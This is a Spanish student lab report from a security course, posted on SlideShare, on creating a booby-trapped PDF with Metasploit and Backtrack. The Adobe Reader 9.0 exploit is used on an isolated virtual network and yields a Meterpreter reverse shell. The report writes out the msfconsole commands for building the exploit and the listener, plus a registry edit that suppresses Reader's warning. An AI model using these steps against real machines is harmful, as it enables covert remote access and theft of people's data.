SlideShare una empresa de Scribd logo
1 de 8
Descargar para leer sin conexión
HACKING BACKTRACK 1

OBJETIVO DE LA PRÁCTICA

Desearemos desde un PC atacante hacer una conexión remota a un PC víctima.
Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema
Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima.
Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos
acceder a la Shell de la víctima y podremos visualizar todo su contenido.

DETALLES A TENER EN CUENTA

La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos
detalles que explicaremos a continuación.







Trabajaremos con MSFConsole en el entorno Backtrack.
Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost.
La versión de Adobe Reader que debe tener el cliente será la 9.0.
Se han editado los registros de Adobe Reader para permitir el uso del .exe.
Se ignorará el hecho de realizar la conexión con el puerto 443.
La víctima debe tener desactivado el Firewall.
ESQUEMA DE LA PRÁCTICA

Equipo atacante = 192.168.1.2
Equipo víctima = 192.168.1.3
Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para
realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos.
El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2.

PROCEDIMIENTO DE LA PRÁCTICA

Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo
llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante
particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red.
El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él
podremos infectar a la víctima una vez abra el archivo que le enviaremos.
Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y
permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán.
Gracias a ésta, se facilita el uso de las herramientas.
CREACIÓN DEL PDF…

A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que
utilizaremos):


use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs.
Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como
extensión.



set payload windows/meterpreter/reverse_tcp
Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la
información del envío de datos que usaremos para el ataque.



set lhost 192.168.1.2.
Añadiremos la IP del Atacante.



set filename vellimalote.pdf
Crearemos un PDF con el nombre indicado.



Exploit
Cargaremos el exploit para que se cree.
TRANSMISIÓN DEL ARCHIVO

Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF
creado.
En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el
uso de éste.
Localizaremos el archivo, en la ruta donde se ha guardado:
/msf4/local/vellimalote.pdf

*Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos
servirá y estamos utilizando es Vellimalote.pdf
Enviaremos el archivo a la máquina Windows 7, que será la víctima:

Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3.
En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la
apertura del archivo.
DETALLES DE ADOBE READER

La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe
Reader.
Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.


Actualizar el registro de Adobe Reader.
Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que
el registro de Adobe Reader debía ser cambiado.
Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente
ruta:
HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 /
FeatureLockDown / cDefaultLaunchAttachmentPerms
Una vez dentro, veremos esto:

Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe.
De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto
relacionado con la infección o el mal uso del archivo.
EMPIEZA EL ATAQUE

Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde
nuestro atacante, valga la redundancia.
Utilizaremos los siguientes comandos:

 Use exploit/multi/handler
Utilizaremos el controlador del Exploit.

 Set payload Windows/meterpreter/reverse_tcp
Utilización del TCP (lo mismo que cuando creamos el PDF).

 Set lhost 192.168.1.2
Agregamos la IP del atacante.

 Exploit
Arrancamos el exploit.

El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo
infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del
usuario y entonces el ataque habrá sido realizado correctamente.
MODO ESCUCHA

La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que
desaparecerá al momento.
Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando
las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el
atacante ha podido realizar la conexión.

El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:
Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la
víctima, sin que éste se dé cuenta de nada.

Y como podemos ver, ya estamos dentro del Desktop de la víctima:

A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente
ser un cotilla y ver toda la información que tiene el usuario.

José Mª Vellido – ASIX2M
Hacking Backtrack 1 – SEGDISP
Fran Pérez – 2013/2014

Más contenido relacionado

La actualidad más candente

Meterpreter en android el desembarco en tu smartphone
Meterpreter en android   el desembarco en tu smartphoneMeterpreter en android   el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphone
JASENT
 
Instalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apacheInstalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apache
Esmeralda Lopez
 

La actualidad más candente (18)

Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Instalar Robocup Windows
Instalar Robocup WindowsInstalar Robocup Windows
Instalar Robocup Windows
 
Ataque DNS Spoofing
Ataque DNS SpoofingAtaque DNS Spoofing
Ataque DNS Spoofing
 
Linux
LinuxLinux
Linux
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Proyectos JAVA con maven
Proyectos JAVA con mavenProyectos JAVA con maven
Proyectos JAVA con maven
 
Linux
LinuxLinux
Linux
 
Pasos para instalar windows 7
Pasos para instalar windows 7Pasos para instalar windows 7
Pasos para instalar windows 7
 
Meterpreter en android el desembarco en tu smartphone
Meterpreter en android   el desembarco en tu smartphoneMeterpreter en android   el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphone
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Subiendo shell explotando lfi via php input
Subiendo shell explotando lfi via php   inputSubiendo shell explotando lfi via php   input
Subiendo shell explotando lfi via php input
 
Ataque Dns spoofing
Ataque Dns spoofingAtaque Dns spoofing
Ataque Dns spoofing
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Instalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apacheInstalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apache
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 

Destacado

Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
Francesc Perez
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Francesc Perez
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
Francesc Perez
 
Proyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticasProyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticas
Francesc Perez
 
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicaciónFundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Francesc Perez
 
Fundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSIFundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSI
Francesc Perez
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Francesc Perez
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer Protocol
Francesc Perez
 
Dynamic Host Configuration Protocol
Dynamic Host Configuration ProtocolDynamic Host Configuration Protocol
Dynamic Host Configuration Protocol
Francesc Perez
 
Fundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la redFundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la red
Francesc Perez
 

Destacado (20)

Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 sol
 
ICT Parte 1/2
ICT Parte 1/2ICT Parte 1/2
ICT Parte 1/2
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
 
Unicode - Hacking The International Character System
Unicode - Hacking The International Character SystemUnicode - Hacking The International Character System
Unicode - Hacking The International Character System
 
Js api formularios
Js api formulariosJs api formularios
Js api formularios
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3
 
Proyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticasProyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticas
 
1a seguridad informatica
1a seguridad informatica1a seguridad informatica
1a seguridad informatica
 
Virus y vacunas informáaticas
Virus y vacunas informáaticasVirus y vacunas informáaticas
Virus y vacunas informáaticas
 
Trabajo práctico n° 3 seguridad informática
Trabajo práctico n° 3 seguridad informáticaTrabajo práctico n° 3 seguridad informática
Trabajo práctico n° 3 seguridad informática
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica
 
Hoja de vida
Hoja de vidaHoja de vida
Hoja de vida
 
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicaciónFundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
 
Fundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSIFundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSI
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer Protocol
 
Dynamic Host Configuration Protocol
Dynamic Host Configuration ProtocolDynamic Host Configuration Protocol
Dynamic Host Configuration Protocol
 
Fundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la redFundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la red
 

Similar a Seguridad: Backtrack1_bis

Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
Brat Stell
 
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Yolanda Ruiz Hervás
 
Linux ud13 - iniciar sesion en linux de forma remota
Linux   ud13 - iniciar sesion en linux de forma remotaLinux   ud13 - iniciar sesion en linux de forma remota
Linux ud13 - iniciar sesion en linux de forma remota
Javier Muñoz
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003
Alonso Caballero
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeeze
xavazquez
 
Servidor WEB
Servidor WEBServidor WEB
Servidor WEB
Lenidav
 

Similar a Seguridad: Backtrack1_bis (20)

Presentacion eduin gonzalez
Presentacion eduin gonzalezPresentacion eduin gonzalez
Presentacion eduin gonzalez
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Instalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuraciónInstalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuración
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
PelicanHPC Implementación fisica con dos nodos
PelicanHPC Implementación fisica con dos nodosPelicanHPC Implementación fisica con dos nodos
PelicanHPC Implementación fisica con dos nodos
 
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
 
Linux ud13 - iniciar sesion en linux de forma remota
Linux   ud13 - iniciar sesion en linux de forma remotaLinux   ud13 - iniciar sesion en linux de forma remota
Linux ud13 - iniciar sesion en linux de forma remota
 
Sallis Usb Hacks
Sallis Usb HacksSallis Usb Hacks
Sallis Usb Hacks
 
Pent box security suite
Pent box security suitePent box security suite
Pent box security suite
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeeze
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
John the Ripper
John the RipperJohn the Ripper
John the Ripper
 
Present3
Present3Present3
Present3
 
Servidor WEB
Servidor WEBServidor WEB
Servidor WEB
 

Más de Francesc Perez

Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
Francesc Perez
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Francesc Perez
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
Francesc Perez
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
Francesc Perez
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
Francesc Perez
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
Francesc Perez
 
La fuente de alimentación
La fuente de alimentación  La fuente de alimentación
La fuente de alimentación
Francesc Perez
 
Componentes de un sistema informático
Componentes de un sistema informáticoComponentes de un sistema informático
Componentes de un sistema informático
Francesc Perez
 

Más de Francesc Perez (20)

Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicas
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales   pràctica 1Sistemas electrónicos digitales   pràctica 1
Sistemas electrónicos digitales pràctica 1
 
html5 multimedia
 html5 multimedia html5 multimedia
html5 multimedia
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
 
Estudio del PC
Estudio del PCEstudio del PC
Estudio del PC
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
 
La fuente de alimentación
La fuente de alimentación  La fuente de alimentación
La fuente de alimentación
 
Componentes de un sistema informático
Componentes de un sistema informáticoComponentes de un sistema informático
Componentes de un sistema informático
 
Javascript
JavascriptJavascript
Javascript
 
css3
css3css3
css3
 
html5
html5html5
html5
 
Introducción al desarrollo de aplicaciones para dispositivos móviles
Introducción al desarrollo de aplicaciones para dispositivos móvilesIntroducción al desarrollo de aplicaciones para dispositivos móviles
Introducción al desarrollo de aplicaciones para dispositivos móviles
 
Fuente de alimentación y osciloscopio (ewb)
Fuente de alimentación y osciloscopio (ewb)Fuente de alimentación y osciloscopio (ewb)
Fuente de alimentación y osciloscopio (ewb)
 
Manual ewb
Manual ewbManual ewb
Manual ewb
 
Circuitos capacitivos practia 1
Circuitos capacitivos   practia 1Circuitos capacitivos   practia 1
Circuitos capacitivos practia 1
 
Amplificador operacional practica 1
Amplificador operacional  practica 1Amplificador operacional  practica 1
Amplificador operacional practica 1
 

Último

Concepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptxConcepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptx
Fernando Solis
 
Proyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdfProyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdf
patriciaines1993
 

Último (20)

Biografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdfBiografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdf
 
Desarrollo y Aplicación de la Administración por Valores
Desarrollo y Aplicación de la Administración por ValoresDesarrollo y Aplicación de la Administración por Valores
Desarrollo y Aplicación de la Administración por Valores
 
PP_Comunicacion en Salud: Objetivación de signos y síntomas
PP_Comunicacion en Salud: Objetivación de signos y síntomasPP_Comunicacion en Salud: Objetivación de signos y síntomas
PP_Comunicacion en Salud: Objetivación de signos y síntomas
 
TRABAJO FINAL TOPOGRAFÍA COMPLETO DE LA UPC
TRABAJO FINAL TOPOGRAFÍA COMPLETO DE LA UPCTRABAJO FINAL TOPOGRAFÍA COMPLETO DE LA UPC
TRABAJO FINAL TOPOGRAFÍA COMPLETO DE LA UPC
 
AEC 2. Aventura en el Antiguo Egipto.pptx
AEC 2. Aventura en el Antiguo Egipto.pptxAEC 2. Aventura en el Antiguo Egipto.pptx
AEC 2. Aventura en el Antiguo Egipto.pptx
 
CONCURSO NACIONAL JOSE MARIA ARGUEDAS.pptx
CONCURSO NACIONAL JOSE MARIA ARGUEDAS.pptxCONCURSO NACIONAL JOSE MARIA ARGUEDAS.pptx
CONCURSO NACIONAL JOSE MARIA ARGUEDAS.pptx
 
Posición astronómica y geográfica de Europa.pptx
Posición astronómica y geográfica de Europa.pptxPosición astronómica y geográfica de Europa.pptx
Posición astronómica y geográfica de Europa.pptx
 
Novena de Pentecostés con textos de san Juan Eudes
Novena de Pentecostés con textos de san Juan EudesNovena de Pentecostés con textos de san Juan Eudes
Novena de Pentecostés con textos de san Juan Eudes
 
Factores que intervienen en la Administración por Valores.pdf
Factores que intervienen en la Administración por Valores.pdfFactores que intervienen en la Administración por Valores.pdf
Factores que intervienen en la Administración por Valores.pdf
 
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLAACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
ACRÓNIMO DE PARÍS PARA SU OLIMPIADA 2024. Por JAVIER SOLIS NOYOLA
 
activ4-bloque4 transversal doctorado.pdf
activ4-bloque4 transversal doctorado.pdfactiv4-bloque4 transversal doctorado.pdf
activ4-bloque4 transversal doctorado.pdf
 
FUERZA Y MOVIMIENTO ciencias cuarto basico.ppt
FUERZA Y MOVIMIENTO ciencias cuarto basico.pptFUERZA Y MOVIMIENTO ciencias cuarto basico.ppt
FUERZA Y MOVIMIENTO ciencias cuarto basico.ppt
 
Interpretación de cortes geológicos 2024
Interpretación de cortes geológicos 2024Interpretación de cortes geológicos 2024
Interpretación de cortes geológicos 2024
 
Tema 10. Dinámica y funciones de la Atmosfera 2024
Tema 10. Dinámica y funciones de la Atmosfera 2024Tema 10. Dinámica y funciones de la Atmosfera 2024
Tema 10. Dinámica y funciones de la Atmosfera 2024
 
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADOTIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
TIENDAS MASS MINIMARKET ESTUDIO DE MERCADO
 
Procedimientos para la planificación en los Centros Educativos tipo V ( multi...
Procedimientos para la planificación en los Centros Educativos tipo V ( multi...Procedimientos para la planificación en los Centros Educativos tipo V ( multi...
Procedimientos para la planificación en los Centros Educativos tipo V ( multi...
 
Concepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptxConcepto y definición de tipos de Datos Abstractos en c++.pptx
Concepto y definición de tipos de Datos Abstractos en c++.pptx
 
Proyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdfProyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdf
 
ACERTIJO LA RUTA DEL MARATÓN OLÍMPICO DEL NÚMERO PI EN PARÍS. Por JAVIER SOL...
ACERTIJO LA RUTA DEL MARATÓN OLÍMPICO DEL NÚMERO PI EN  PARÍS. Por JAVIER SOL...ACERTIJO LA RUTA DEL MARATÓN OLÍMPICO DEL NÚMERO PI EN  PARÍS. Por JAVIER SOL...
ACERTIJO LA RUTA DEL MARATÓN OLÍMPICO DEL NÚMERO PI EN PARÍS. Por JAVIER SOL...
 
La Sostenibilidad Corporativa. Administración Ambiental
La Sostenibilidad Corporativa. Administración AmbientalLa Sostenibilidad Corporativa. Administración Ambiental
La Sostenibilidad Corporativa. Administración Ambiental
 

Seguridad: Backtrack1_bis

  • 1. HACKING BACKTRACK 1 OBJETIVO DE LA PRÁCTICA Desearemos desde un PC atacante hacer una conexión remota a un PC víctima. Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima. Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos acceder a la Shell de la víctima y podremos visualizar todo su contenido. DETALLES A TENER EN CUENTA La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos detalles que explicaremos a continuación.       Trabajaremos con MSFConsole en el entorno Backtrack. Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost. La versión de Adobe Reader que debe tener el cliente será la 9.0. Se han editado los registros de Adobe Reader para permitir el uso del .exe. Se ignorará el hecho de realizar la conexión con el puerto 443. La víctima debe tener desactivado el Firewall.
  • 2. ESQUEMA DE LA PRÁCTICA Equipo atacante = 192.168.1.2 Equipo víctima = 192.168.1.3 Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos. El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2. PROCEDIMIENTO DE LA PRÁCTICA Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red. El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él podremos infectar a la víctima una vez abra el archivo que le enviaremos. Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán. Gracias a ésta, se facilita el uso de las herramientas.
  • 3. CREACIÓN DEL PDF… A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que utilizaremos):  use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs. Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como extensión.  set payload windows/meterpreter/reverse_tcp Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la información del envío de datos que usaremos para el ataque.  set lhost 192.168.1.2. Añadiremos la IP del Atacante.  set filename vellimalote.pdf Crearemos un PDF con el nombre indicado.  Exploit Cargaremos el exploit para que se cree.
  • 4. TRANSMISIÓN DEL ARCHIVO Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF creado. En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el uso de éste. Localizaremos el archivo, en la ruta donde se ha guardado: /msf4/local/vellimalote.pdf *Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos servirá y estamos utilizando es Vellimalote.pdf Enviaremos el archivo a la máquina Windows 7, que será la víctima: Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3. En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la apertura del archivo.
  • 5. DETALLES DE ADOBE READER La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe Reader. Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.  Actualizar el registro de Adobe Reader. Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que el registro de Adobe Reader debía ser cambiado. Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente ruta: HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 / FeatureLockDown / cDefaultLaunchAttachmentPerms Una vez dentro, veremos esto: Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe. De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto relacionado con la infección o el mal uso del archivo.
  • 6. EMPIEZA EL ATAQUE Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde nuestro atacante, valga la redundancia. Utilizaremos los siguientes comandos:  Use exploit/multi/handler Utilizaremos el controlador del Exploit.  Set payload Windows/meterpreter/reverse_tcp Utilización del TCP (lo mismo que cuando creamos el PDF).  Set lhost 192.168.1.2 Agregamos la IP del atacante.  Exploit Arrancamos el exploit. El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del usuario y entonces el ataque habrá sido realizado correctamente.
  • 7. MODO ESCUCHA La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que desaparecerá al momento. Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el atacante ha podido realizar la conexión. El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:
